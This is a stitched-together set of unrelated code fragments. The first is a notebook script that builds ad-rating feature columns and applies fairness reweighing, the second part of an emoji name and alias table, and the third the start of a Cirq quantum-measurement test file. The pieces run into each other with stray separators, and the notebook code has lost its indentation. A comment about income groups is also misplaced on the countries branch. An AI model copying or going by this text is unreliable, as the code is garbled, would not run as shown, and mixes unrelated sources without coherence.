MOSTLISTENEDMUSICS_9: "**",
MOSTLISTENEDMUSICS_10: "**",
MOSTLISTENEDMUSICS_11: "**",
MOSTLISTENEDMUSICS_12: "**",
MOSTLISTENEDMUSICS_13: "**",
MOSTLISTENEDMUSICS_14: "**",
MOSTLISTENEDMUSICS_15: "**",
MOSTLISTENEDMUSICS_16: "**",
MOSTLISTENEDMUSICS_17: "**",
MOSTLISTENEDMUSICS_18: "**",
MOSTLISTENEDMUSICS_19: "**",
MOSTLISTENEDMUSICS_20: "**",
MOSTLISTENEDMUSICS_21: "**",
MOSTLISTENEDMUSICS_22: "**",
MOSTREADBOOKS_1: "**",
MOSTREADBOOKS_2: "**",
MOSTREADBOOKS_3: "**",
MOSTREADBOOKS_4: "**",
MOSTREADBOOKS_5: "**",
MOSTREADBOOKS_6: "**",
MOSTREADBOOKS_7: "**",
MOSTREADBOOKS_8: "**",
MOSTREADBOOKS_9: "**",
MOSTREADBOOKS_10: "**",
MOSTREADBOOKS_11: "**",
MOSTREADBOOKS_12: "**",
MOSTREADBOOKS_13: "**",
MOSTREADBOOKS_14: "**",
MOSTREADBOOKS_15: "**",
MOSTREADBOOKS_16: "**",
MOSTREADBOOKS_17: "**",
MOSTREADBOOKS_18: "**",
MOSTREADBOOKS_19: "**",
MOSTREADBOOKS_20: "**",
MOSTREADBOOKS_21: "**",
MOSTREADBOOKS_22: "**",
MOSTREADBOOKS_23: "**",
MOSTREADBOOKS_24: "**",
MOSTREADBOOKS_25: "**",
MOSTREADBOOKS_26: "**",
MOSTREADBOOKS_27: "**",
MOSTREADBOOKS_28: "**",
MOSTREADBOOKS_29: "**",
MOSTREADBOOKS_30: "**",
MOSTREADBOOKS_31: "**",
MOSTWATCHEDMOVIES_1: "**",
MOSTWATCHEDMOVIES_2: "**",
MOSTWATCHEDMOVIES_3: "**",
MOSTWATCHEDMOVIES_4: "**",
MOSTWATCHEDMOVIES_5: "**",
MOSTWATCHEDMOVIES_6: "**",
MOSTWATCHEDMOVIES_7: "**",
MOSTWATCHEDMOVIES_8: "**",
MOSTWATCHEDMOVIES_9: "**",
MOSTWATCHEDMOVIES_10: "**",
MOSTWATCHEDMOVIES_11: "**",
MOSTWATCHEDMOVIES_12: "**",
MOSTWATCHEDMOVIES_13: "**",
MOSTWATCHEDMOVIES_14: "**",
MOSTWATCHEDMOVIES_15: "**",
MOSTWATCHEDMOVIES_16: "**",
MOSTWATCHEDMOVIES_17: "**",
MOSTWATCHEDMOVIES_18: "**",
MOSTWATCHEDMOVIES_19: "**",
MOSTWATCHEDMOVIES_20: "**",
MOSTWATCHEDMOVIES_21: "**",
MOSTWATCHEDTVPROGRAMMES_1: "**",
MOSTWATCHEDTVPROGRAMMES_2: "**",
MOSTWATCHEDTVPROGRAMMES_3: "**",
MOSTWATCHEDTVPROGRAMMES_4: "**",
MOSTWATCHEDTVPROGRAMMES_5: "**",
MOSTWATCHEDTVPROGRAMMES_6: "**",
MOSTWATCHEDTVPROGRAMMES_7: "**",
MOSTWATCHEDTVPROGRAMMES_8: "**",
MOSTWATCHEDTVPROGRAMMES_9: "**",
MOSTWATCHEDTVPROGRAMMES_10: "**",
MOSTWATCHEDTVPROGRAMMES_11: "**",
RATING: "**",
AD_NUM_FACES: "**",
FAV: "**",
UNFAV: "**"
}
AD_FACE_COLS = [AD_NUM_FACES]
AD_LABEL_COLS = [AD_LABEL_FEATURE_1,AD_LABEL_FEATURE_2,AD_LABEL_FEATURE_3,AD_LABEL_FEATURE_4,AD_LABEL_FEATURE_5,
AD_LABEL_FEATURE_6,AD_LABEL_FEATURE_7,AD_LABEL_FEATURE_8,AD_LABEL_FEATURE_9,AD_LABEL_FEATURE_10,
AD_LABEL_FEATURE_11,AD_LABEL_FEATURE_12,AD_LABEL_FEATURE_13,AD_LABEL_FEATURE_14,AD_LABEL_FEATURE_15,
AD_LABEL_FEATURE_16,AD_LABEL_FEATURE_17,AD_LABEL_FEATURE_18,AD_LABEL_FEATURE_19,AD_LABEL_FEATURE_20,
AD_LABEL_FEATURE_21,AD_LABEL_FEATURE_22,AD_LABEL_FEATURE_23,AD_LABEL_FEATURE_24,AD_LABEL_FEATURE_25]
AD_OBJECT_COLS = [AD_OBJECT_FEATURE_1,AD_OBJECT_FEATURE_2,AD_OBJECT_FEATURE_3,AD_OBJECT_FEATURE_4,AD_OBJECT_FEATURE_5,
AD_OBJECT_FEATURE_6,AD_OBJECT_FEATURE_7,AD_OBJECT_FEATURE_8,AD_OBJECT_FEATURE_9,AD_OBJECT_FEATURE_10,
AD_OBJECT_FEATURE_11,AD_OBJECT_FEATURE_12,AD_OBJECT_FEATURE_13,AD_OBJECT_FEATURE_14,AD_OBJECT_FEATURE_15,
AD_OBJECT_FEATURE_16,AD_OBJECT_FEATURE_17,AD_OBJECT_FEATURE_18,AD_OBJECT_FEATURE_19,AD_OBJECT_FEATURE_20,
AD_OBJECT_FEATURE_21,AD_OBJECT_FEATURE_22,AD_OBJECT_FEATURE_23,AD_OBJECT_FEATURE_24]
AD_SAFE_SEARCH_COLS = [AD_SAFESEARCH_FEATURE_1,AD_SAFESEARCH_FEATURE_2,AD_SAFESEARCH_FEATURE_3,AD_SAFESEARCH_FEATURE_4,
AD_SAFESEARCH_FEATURE_5,AD_SAFESEARCH_FEATURE_6,AD_SAFESEARCH_FEATURE_7,AD_SAFESEARCH_FEATURE_8,
AD_SAFESEARCH_FEATURE_9,AD_SAFESEARCH_FEATURE_10,AD_SAFESEARCH_FEATURE_11,AD_SAFESEARCH_FEATURE_12,AD_SAFESEARCH_FEATURE_13]
SELECTED_AD_COLS = AD_FACE_COLS + AD_LABEL_COLS + AD_OBJECT_COLS + AD_SAFE_SEARCH_COLS
SELECTED_HOMECOUNTRY_COLS = [HOMECOUNTRY_CANADA, HOMECOUNTRY_CZECHREPUBLIC, HOMECOUNTRY_GREATBRITAIN,
HOMECOUNTRY_INDIA, HOMECOUNTRY_ITALY, HOMECOUNTRY_PHILLIPINES, HOMECOUNTRY_ROMANIA,
HOMECOUNTRY_SAUDIARABIA, HOMECOUNTRY_SINGAPORE, HOMECOUNTRY_SLOVENIA,
HOMECOUNTRY_UNITEDKINGDOM, HOMECOUNTRY_UNITEDSTATESOFAMERICA]
SELECTED_INCOME_COLS = [INCOME_0, INCOME_1, INCOME_2, INCOME_3]
SELECTED_MOSTLISTENEDMUSICS_COLS = [MOSTLISTENEDMUSICS_1, MOSTLISTENEDMUSICS_2, MOSTLISTENEDMUSICS_3,
MOSTLISTENEDMUSICS_4, MOSTLISTENEDMUSICS_5, MOSTLISTENEDMUSICS_6,
MOSTLISTENEDMUSICS_7, MOSTLISTENEDMUSICS_8, MOSTLISTENEDMUSICS_9,
MOSTLISTENEDMUSICS_10, MOSTLISTENEDMUSICS_11, MOSTLISTENEDMUSICS_12,
MOSTLISTENEDMUSICS_13, MOSTLISTENEDMUSICS_14, MOSTLISTENEDMUSICS_15,
MOSTLISTENEDMUSICS_16, MOSTLISTENEDMUSICS_17, MOSTLISTENEDMUSICS_18,
MOSTLISTENEDMUSICS_19, MOSTLISTENEDMUSICS_20, MOSTLISTENEDMUSICS_21,
MOSTLISTENEDMUSICS_22]
SELECTED_MOSTREADBOOKS_COLS = [MOSTREADBOOKS_1, MOSTREADBOOKS_2, MOSTREADBOOKS_3, MOSTREADBOOKS_4,
MOSTREADBOOKS_5, MOSTREADBOOKS_6, MOSTREADBOOKS_7, MOSTREADBOOKS_8,
MOSTREADBOOKS_9, MOSTREADBOOKS_10, MOSTREADBOOKS_11, MOSTREADBOOKS_12,
MOSTREADBOOKS_13, MOSTREADBOOKS_14, MOSTREADBOOKS_15, MOSTREADBOOKS_16,
MOSTREADBOOKS_17, MOSTREADBOOKS_18, MOSTREADBOOKS_19, MOSTREADBOOKS_20,
MOSTREADBOOKS_21, MOSTREADBOOKS_22, MOSTREADBOOKS_23, MOSTREADBOOKS_24,
MOSTREADBOOKS_25, MOSTREADBOOKS_26, MOSTREADBOOKS_27, MOSTREADBOOKS_28,
MOSTREADBOOKS_29, MOSTREADBOOKS_30, MOSTREADBOOKS_31]
SELECTED_MOSTWATCHEDMOVIES_COLS = [MOSTWATCHEDMOVIES_1, MOSTWATCHEDMOVIES_2, MOSTWATCHEDMOVIES_3,
MOSTWATCHEDMOVIES_4, MOSTWATCHEDMOVIES_5, MOSTWATCHEDMOVIES_6,
MOSTWATCHEDMOVIES_7, MOSTWATCHEDMOVIES_8, MOSTWATCHEDMOVIES_9,
MOSTWATCHEDMOVIES_10, MOSTWATCHEDMOVIES_11, MOSTWATCHEDMOVIES_12,
MOSTWATCHEDMOVIES_13, MOSTWATCHEDMOVIES_14, MOSTWATCHEDMOVIES_15,
MOSTWATCHEDMOVIES_16, MOSTWATCHEDMOVIES_17, MOSTWATCHEDMOVIES_18,
MOSTWATCHEDMOVIES_19, MOSTWATCHEDMOVIES_20, MOSTWATCHEDMOVIES_21]
SELECTED_MOSTWATCHEDTVPROGRAMMES_COLS = [MOSTWATCHEDTVPROGRAMMES_1, MOSTWATCHEDTVPROGRAMMES_2,
MOSTWATCHEDTVPROGRAMMES_3, MOSTWATCHEDTVPROGRAMMES_4,
MOSTWATCHEDTVPROGRAMMES_5, MOSTWATCHEDTVPROGRAMMES_6,
MOSTWATCHEDTVPROGRAMMES_7, MOSTWATCHEDTVPROGRAMMES_8,
MOSTWATCHEDTVPROGRAMMES_9, MOSTWATCHEDTVPROGRAMMES_10,
MOSTWATCHEDTVPROGRAMMES_11]
SELECTED_INP_COLS = [AGE, ZIP_CODE, FAVE_SPORTS, GENDER_F, GENDER_M] + SELECTED_AD_COLS + SELECTED_HOMECOUNTRY_COLS + SELECTED_INCOME_COLS + SELECTED_MOSTLISTENEDMUSICS_COLS + SELECTED_MOSTREADBOOKS_COLS + SELECTED_MOSTWATCHEDMOVIES_COLS + SELECTED_MOSTWATCHEDTVPROGRAMMES_COLS
EMBED_COLS = [FAV, UNFAV]
SELECTED_COLS = SELECTED_INP_COLS + [TARGET_COL]
print(SELECTED_COLS)
def reweigh_biased_cols(bias_cols,df):
y = df[[RATING]]
X = df[bias_cols]
# Assumtion for each column (except AGE) value 1 : privilaged , value 0 : non-privilaged
priv_cols = []
for col in bias_cols:
if col == AGE:
X[AGE] = pd.to_numeric(df[AGE])
bucket_boundaries = [0, 20, 40, 100] # refer pandas.cut() for syntax on binning
X["Age_bucket"] = pd.cut(X[AGE], bins=bucket_boundaries, labels=["young", "middle-age", "old"])
X['privilaged_age_bucket'] = 0.0
#considering middle_age and old as privilaged group
X.loc[X['Age_bucket'] != "young", 'privilaged_age_bucket'] = 1.0
priv_cols.append('privilaged_age_bucket')
elif col == GENDER_F:
X[col] = pd.to_numeric(df[col])
priv_cols.append(col)
elif col == INCOME_3:
X[col] = pd.to_numeric(df[col])
X[col] = X[col].replace({0:1, 1:0}) # Considering Income group 0 , 1, 2 as privilaged
priv_cols.append(col)
elif col == "countries":
X["countries"] = pd.to_numeric(df[col])
X[col] = X[col].replace({0:1, 1:0}) # Considering Income group 0 , 1, 2 as privilaged
priv_cols.append(col)
else:
raise NotImplementedError(f"Don't know how to reweigh {col}")
y[RATING] = pd.to_numeric(y[RATING])
y.loc[y[RATING] != 1.0, RATING] = 2.0
y[RATING] = y[RATING] - 1.0
X = X[priv_cols]
train_pp_bld = BinaryLabelDataset(df=pd.concat((X, y),axis=1),
label_names=[RATING],
protected_attribute_names=priv_cols,
favorable_label=1.0,
unfavorable_label=0.0)
privileged_dict = {}
unprivileged_dict = {}
for col in priv_cols:
privileged_dict[col] = 1
unprivileged_dict[col] = 0
privileged_groups = [privileged_dict]
unprivileged_groups = [unprivileged_dict]
rw = Reweighing(unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups)
train_pp_bld_f = rw.fit_transform(train_pp_bld)
#df["fairness_privilage_weight"] = train_pp_bld_f.instance_weights
#df["fairness_privilage_weight"] = df["fairness_privilage_weight"].astype(str)
return train_pp_bld_f.instance_weights
def ad_dataset_pd(usecols:List[str]=None, **read_csv_kwargs):
"""
Read from csv files given set of columns into Pandas Dataframe
"""
return pd.read_csv(users_ads_rating_csv, usecols=usecols, dtype=str, **read_csv_kwargs)
ad_dataset_pd(SELECTED_COLS).sample(5).T
chakin.search(lang='English')
WORD_VEC_DIMENSIONS = 50
get_ipython().run_cell_magic('time', '', '\nembedding_index = EmbeddingFactory(Path("./embeddings/"), "GloVe.6B.50d", WORD_VEC_DIMENSIONS, nrows=None, skiprows=None)')
def transform_embed_col(s:pd.Series, t:Tokenizer, maxlen:int=None):
"""Tokenizes each row in s using t and pads them to equal length of maxlen. Computes maxlen if not provided"""
# integer encode the text data
encoded_col = t.texts_to_sequences(s)
# calculate max len of vector and make length equal by padding with zeros
if maxlen is None:
maxlen = max(len(x) for x in encoded_col) | |
'arabian_camel', 'aliases': []},
'1f42b': {'canonical_name': 'camel', 'aliases': []},
'1f418': {'canonical_name': 'elephant', 'aliases': []},
'1f98f': {'canonical_name': 'rhinoceros', 'aliases': []},
'1f98d': {'canonical_name': 'gorilla', 'aliases': []},
'1f40e': {'canonical_name': 'horse', 'aliases': []},
'1f416': {'canonical_name': 'pig', 'aliases': ['oink']},
'1f410': {'canonical_name': 'goat', 'aliases': []},
'1f40f': {'canonical_name': 'ram', 'aliases': []},
'1f411': {'canonical_name': 'sheep', 'aliases': ['baa']},
'1f415': {'canonical_name': 'dog', 'aliases': ['woof']},
'1f429': {'canonical_name': 'poodle', 'aliases': []},
'1f408': {'canonical_name': 'cat', 'aliases': ['meow']},
# alarm seemed like a fun addition
'1f413': {'canonical_name': 'rooster', 'aliases': ['alarm', 'cock-a-doodle-doo']},
'1f983': {'canonical_name': 'turkey', 'aliases': []},
'1f54a': {'canonical_name': 'dove', 'aliases': ['dove_of_peace']},
'1f407': {'canonical_name': 'rabbit', 'aliases': []},
'1f401': {'canonical_name': 'mouse', 'aliases': []},
'1f400': {'canonical_name': 'rat', 'aliases': []},
'1f43f': {'canonical_name': 'chipmunk', 'aliases': []},
# paws seemed like reasonable addition. Put feet at People/135
'1f43e': {'canonical_name': 'paw_prints', 'aliases': ['paws']},
'1f409': {'canonical_name': 'dragon', 'aliases': []},
'1f432': {'canonical_name': 'dragon_face', 'aliases': []},
'1f335': {'canonical_name': 'cactus', 'aliases': []},
'1f384': {'canonical_name': 'holiday_tree', 'aliases': []},
'1f332': {'canonical_name': 'evergreen_tree', 'aliases': []},
'1f333': {'canonical_name': 'tree', 'aliases': ['deciduous_tree']},
'1f334': {'canonical_name': 'palm_tree', 'aliases': []},
# sprout seemed like a reasonable addition
'1f331': {'canonical_name': 'seedling', 'aliases': ['sprout']},
# seemed like the best emoji for plant
'1f33f': {'canonical_name': 'herb', 'aliases': ['plant']},
# clover seemed like a reasonable addition
'2618': {'canonical_name': 'shamrock', 'aliases': ['clover']},
# lucky seems more useful
'1f340': {'canonical_name': 'lucky', 'aliases': ['four_leaf_clover']},
'1f38d': {'canonical_name': 'bamboo', 'aliases': []},
# https://emojipedia.org/tanabata-tree/
'1f38b': {'canonical_name': 'wish_tree', 'aliases': ['tanabata_tree']},
# seemed like good additions. Used fall instead of autumn, since don't have
# the rest of the seasons, and could imagine someone using both meanings of
# fall.
'1f343': {'canonical_name': 'leaves', 'aliases': ['wind', 'fall']},
'1f342': {'canonical_name': 'fallen_leaf', 'aliases': []},
'1f341': {'canonical_name': 'maple_leaf', 'aliases': []},
'1f344': {'canonical_name': 'mushroom', 'aliases': []},
# harvest seems more useful
'1f33e': {'canonical_name': 'harvest', 'aliases': ['ear_of_rice']},
'1f490': {'canonical_name': 'bouquet', 'aliases': []},
# seems like the best emoji for flower
'1f337': {'canonical_name': 'tulip', 'aliases': ['flower']},
'1f339': {'canonical_name': 'rose', 'aliases': []},
# crushed suggest by a user
'1f940': {'canonical_name': 'wilted_flower', 'aliases': ['crushed']},
'1f33b': {'canonical_name': 'sunflower', 'aliases': []},
'1f33c': {'canonical_name': 'blossom', 'aliases': []},
'1f338': {'canonical_name': 'cherry_blossom', 'aliases': []},
'1f33a': {'canonical_name': 'hibiscus', 'aliases': []},
'1f30e': {'canonical_name': 'earth_americas', 'aliases': []},
'1f30d': {'canonical_name': 'earth_africa', 'aliases': []},
'1f30f': {'canonical_name': 'earth_asia', 'aliases': []},
'1f315': {'canonical_name': 'full_moon', 'aliases': []},
# too many useless moons. Don't seem to get much use on twitter, and clog
# up typeahead for moon.
# '1f316': {'canonical_name': 'X', 'aliases': ['waning_crescent_moon']},
# '1f317': {'canonical_name': 'X', 'aliases': ['last_quarter_moon']},
# '1f318': {'canonical_name': 'X', 'aliases': ['waning_crescent_moon']},
'1f311': {'canonical_name': 'new_moon', 'aliases': []},
# '1f312': {'canonical_name': 'X', 'aliases': ['waxing_crescent_moon']},
# '1f313': {'canonical_name': 'X', 'aliases': ['first_quarter_moon']},
'1f314': {'canonical_name': 'waxing_moon', 'aliases': []},
'1f31a': {'canonical_name': 'new_moon_face', 'aliases': []},
'1f31d': {'canonical_name': 'moon_face', 'aliases': []},
'1f31e': {'canonical_name': 'sun_face', 'aliases': []},
# goodnight seems way more useful
'1f31b': {'canonical_name': 'goodnight', 'aliases': []},
# '1f31c': {'canonical_name': 'X', 'aliases': ['last_quarter_moon_with_face']},
# seems like the best emoji for moon
'1f319': {'canonical_name': 'moon', 'aliases': []},
# dizzy taken by People/54, had to come up with something else
'1f4ab': {'canonical_name': 'seeing_stars', 'aliases': []},
'2b50': {'canonical_name': 'star', 'aliases': []},
# glowing_star from gemoji/unicode
'1f31f': {'canonical_name': 'glowing_star', 'aliases': []},
# glamour seems like a reasonable addition
'2728': {'canonical_name': 'sparkles', 'aliases': ['glamour']},
# high_voltage from gemoji/unicode
'26a1': {'canonical_name': 'high_voltage', 'aliases': ['zap']},
# https://emojipedia.org/fire/
'1f525': {'canonical_name': 'fire', 'aliases': ['lit', 'hot', 'flame']},
# explosion and crash seem like reasonable additions
'1f4a5': {'canonical_name': 'boom', 'aliases': ['explosion', 'crash', 'collision']},
# meteor seems like a reasonable addition
'2604': {'canonical_name': 'comet', 'aliases': ['meteor']},
'2600': {'canonical_name': 'sunny', 'aliases': []},
'1f324': {'canonical_name': 'mostly_sunny', 'aliases': []},
# partly_cloudy for the glass half empty people
'26c5': {'canonical_name': 'partly_sunny', 'aliases': ['partly_cloudy']},
'1f325': {'canonical_name': 'cloudy', 'aliases': []},
# sunshowers seems like a more fun term
'1f326': {'canonical_name': 'sunshowers', 'aliases': ['sun_and_rain', 'partly_sunny_with_rain']},
# pride and lgbtq seem like reasonable additions
'1f308': {'canonical_name': 'rainbow', 'aliases': ['pride', 'lgbtq']},
# overcast seems like a good addition
'2601': {'canonical_name': 'cloud', 'aliases': ['overcast']},
# suggested by user typing these into their typeahead.
'1f327': {'canonical_name': 'rainy', 'aliases': ['soaked', 'drenched']},
# thunderstorm seems better for this emoji, and thunder_and_rain more
# evocative than thunder_cloud_and_rain
'26c8': {'canonical_name': 'thunderstorm', 'aliases': ['thunder_and_rain']},
# lightning_storm seemed better than lightning_cloud
'1f329': {'canonical_name': 'lightning', 'aliases': ['lightning_storm']},
# snowy to parallel sunny, cloudy, etc; snowstorm seems like a good
# addition
'1f328': {'canonical_name': 'snowy', 'aliases': ['snowstorm']},
'2603': {'canonical_name': 'snowman', 'aliases': []},
# don't need two snowmen. frosty is nice because it's a weather (primary
# benefit) and also a snowman (one that suffered from not having snow, in
# fact)
'26c4': {'canonical_name': 'frosty', 'aliases': []},
'2744': {'canonical_name': 'snowflake', 'aliases': []},
# the internet didn't seem to have a good use for this emoji. windy is a
# good weather that is otherwise not represented. mother_nature from
# https://emojipedia.org/wind-blowing-face/
'1f32c': {'canonical_name': 'windy', 'aliases': ['mother_nature']},
'1f4a8': {'canonical_name': 'dash', 'aliases': []},
# tornado_cloud comes from the unicode, but e.g. gemoji drops the cloud
'1f32a': {'canonical_name': 'tornado', 'aliases': []},
# hazy seemed like a good addition
'1f32b': {'canonical_name': 'fog', 'aliases': ['hazy']},
'1f30a': {'canonical_name': 'ocean', 'aliases': []},
# drop seems better than droplet, since could be used for its other
# meanings. water drop partly so that it shows up in typeahead for water
'1f4a7': {'canonical_name': 'drop', 'aliases': ['water_drop']},
'1f4a6': {'canonical_name': 'sweat_drops', 'aliases': []},
'2614': {'canonical_name': 'umbrella_with_rain', 'aliases': []},
'1f34f': {'canonical_name': 'green_apple', 'aliases': []},
'1f34e': {'canonical_name': 'apple', 'aliases': []},
'1f350': {'canonical_name': 'pear', 'aliases': []},
# An argument for not calling this orange is to save the color for a color
# swatch, but we can deal with that when it happens. Mandarin is from
# https://emojipedia.org/tangerine/, also like that it has a second meaning
'1f34a': {'canonical_name': 'orange', 'aliases': ['tangerine', 'mandarin']},
'1f34b': {'canonical_name': 'lemon', 'aliases': []},
'1f34c': {'canonical_name': 'banana', 'aliases': []},
'1f349': {'canonical_name': 'watermelon', 'aliases': []},
'1f347': {'canonical_name': 'grapes', 'aliases': []},
'1f353': {'canonical_name': 'strawberry', 'aliases': []},
'1f348': {'canonical_name': 'melon', 'aliases': []},
'1f352': {'canonical_name': 'cherries', 'aliases': []},
'1f351': {'canonical_name': 'peach', 'aliases': []},
'1f34d': {'canonical_name': 'pineapple', 'aliases': []},
'1f95d': {'canonical_name': 'kiwi', 'aliases': []},
'1f951': {'canonical_name': 'avocado', 'aliases': []},
'1f345': {'canonical_name': 'tomato', 'aliases': []},
'1f346': {'canonical_name': 'eggplant', 'aliases': []},
'1f952': {'canonical_name': 'cucumber', 'aliases': []},
'1f955': {'canonical_name': 'carrot', 'aliases': []},
# maize is from unicode
'1f33d': {'canonical_name': 'corn', 'aliases': ['maize']},
# chili_pepper seems like a reasonable addition
'1f336': {'canonical_name': 'hot_pepper', 'aliases': ['chili_pepper']},
'1f954': {'canonical_name': 'potato', 'aliases': []},
# yam seems better than sweet_potato, since we already have a potato (not a
# strong argument, but is better on the typeahead not to have emoji that
# share long prefixes)
'1f360': {'canonical_name': 'yam', 'aliases': ['sweet_potato']},
'1f330': {'canonical_name': 'chestnut', 'aliases': []},
'1f95c': {'canonical_name': 'peanuts', 'aliases': []},
'1f36f': {'canonical_name': 'honey', 'aliases': []},
'1f950': {'canonical_name': 'croissant', 'aliases': []},
'1f35e': {'canonical_name': 'bread', 'aliases': []},
'1f956': {'canonical_name': 'baguette', 'aliases': []},
'1f9c0': {'canonical_name': 'cheese', 'aliases': []},
'1f95a': {'canonical_name': 'egg', 'aliases': []},
# already have an egg in Foods/31, though I guess wouldn't be a big deal to
# add it here.
'1f373': {'canonical_name': 'cooking', 'aliases': []},
'1f953': {'canonical_name': 'bacon', 'aliases': []},
# there's no lunch and dinner, which is a small negative against adding
# breakfast
'1f95e': {'canonical_name': 'pancakes', 'aliases': ['breakfast']},
# There is already shrimp in Nature/51, and tempura seems like a better
# description
'1f364': {'canonical_name': 'tempura', 'aliases': []},
# drumstick seems like a better description
'1f357': {'canonical_name': 'drumstick', 'aliases': ['poultry']},
'1f356': {'canonical_name': 'meat', 'aliases': []},
'1f355': {'canonical_name': 'pizza', 'aliases': []},
'1f32d': {'canonical_name': 'hotdog', 'aliases': []},
'1f354': {'canonical_name': 'hamburger', 'aliases': []},
'1f35f': {'canonical_name': 'fries', 'aliases': []},
# https://emojipedia.org/stuffed-flatbread/
'1f959': {'canonical_name': 'doner_kebab', 'aliases': ['shawarma', 'souvlaki', 'stuffed_flatbread']},
'1f32e': {'canonical_name': 'taco', 'aliases': []},
'1f32f': {'canonical_name': 'burrito', 'aliases': []},
'1f957': {'canonical_name': 'salad', 'aliases': []},
# I think Foods/49 is a better :food:
'1f958': {'canonical_name': 'paella', 'aliases': []},
'1f35d': {'canonical_name': 'spaghetti', 'aliases': []},
# seems like the best noodles? maybe this should be Foods/47? Noodles seem
# like a bigger thing in east asia than in europe, so going with that.
'1f35c': {'canonical_name': 'ramen', 'aliases': ['noodles']},
# seems like the best :food:. Also a reasonable :soup:, though the google
# one is indeed more a pot of food (the unicode) than a | |
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import datetime
import time
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work.observable_measurement_data import (
_check_and_get_real_coef,
_obs_vals_from_measurements,
_stats_from_measurements,
)
from cirq.work.observable_settings import _MeasurementSpec
def test_get_real_coef():
q0 = cirq.LineQubit(0)
assert _check_and_get_real_coef(cirq.Z(q0) * 2, atol=1e-8) == 2
assert _check_and_get_real_coef(cirq.Z(q0) * complex(2.0), atol=1e-8) == 2
with pytest.raises(ValueError):
_check_and_get_real_coef(cirq.Z(q0) * 2.0j, atol=1e-8)
def test_obs_vals_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
vals = _obs_vals_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
should_be = [10, -10, -10, 10]
np.testing.assert_equal(vals, should_be)
def test_stats_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
mean, err = _stats_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
# The mean is zero since our bitstrings have balanced even- and odd-
# parity cases.
assert mean == 0
# Since we multiplied our observable by 10, the standard deviation is
# 10 [each obs val deviates by 10]. The variance is 10**2 and the
# squared-standard-error-of-the-mean can be found by dividing by the
# number of samples minus 1.
assert err == 10**2 / (4 - 1)
def test_observable_measured_result():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
omr = cw.ObservableMeasuredResult(
setting=cw.InitObsSetting(
init_state=cirq.Z(a) * cirq.Z(b), observable=cirq.Y(a) * cirq.Y(b)
),
mean=0,
variance=5**2,
repetitions=4,
circuit_params={'phi': 52},
)
assert omr.stddev == 5
assert omr.observable == cirq.Y(a) * cirq.Y(b)
assert omr.init_state == cirq.Z(a) * cirq.Z(b)
cirq.testing.assert_equivalent_repr(omr)
assert omr.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
}
omr2 = dataclasses.replace(
omr,
circuit_params={
'phi': 52,
'observable': 3.14, # this would be a bad but legal parameter name
'param.phi': -1,
},
)
assert omr2.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
'param.observable': 3.14,
'param.param.phi': -1,
}
@pytest.fixture()
def example_bsa() -> 'cw.BitstringAccumulator':
"""Test fixture to create an (empty) example BitstringAccumulator"""
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting, circuit_params={'beta': 0.123, 'gamma': 0.456}
)
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[
setting,
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.X(q0)),
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.Y(q1)),
],
qubit_to_index={q0: 0, q1: 1},
)
return bsa
def test_bitstring_accumulator(example_bsa):
# test initialization
assert example_bsa.bitstrings.shape == (0, 2)
assert example_bsa.chunksizes.shape == (0,)
assert example_bsa.timestamps.shape == (0,)
# test consume_results
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
assert example_bsa.bitstrings.shape == (4, 2)
assert example_bsa.chunksizes.shape == (1,)
assert example_bsa.timestamps.shape == (1,)
assert example_bsa.n_repetitions == 4
with pytest.raises(ValueError):
example_bsa.consume_results(bitstrings.astype(int))
# test results
results = list(example_bsa.results)
assert len(results) == 3
for r in results:
assert r.repetitions == 4
# test records
for r in example_bsa.records:
assert isinstance(r, dict)
assert 'repetitions' in r
assert r['repetitions'] == 4
def test_bitstring_accumulator_strings(example_bsa):
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q1), cirq.X(q0) * cirq.Y(q1)], qubits=[q0, q1]
)
strings_should_be = [
'+Z(q(0)) * +Z(q(1)) → X(q(0)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) → Y(q(1)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)): 0.000 +- 0.577',
]
for setting, ssb in zip(settings, strings_should_be):
assert example_bsa.summary_string(setting) == ssb, ssb
assert (
str(example_bsa)
== """Accumulator +Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)); 4 repetitions
+Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) → X(q(0)): 0.000 +- 0.577
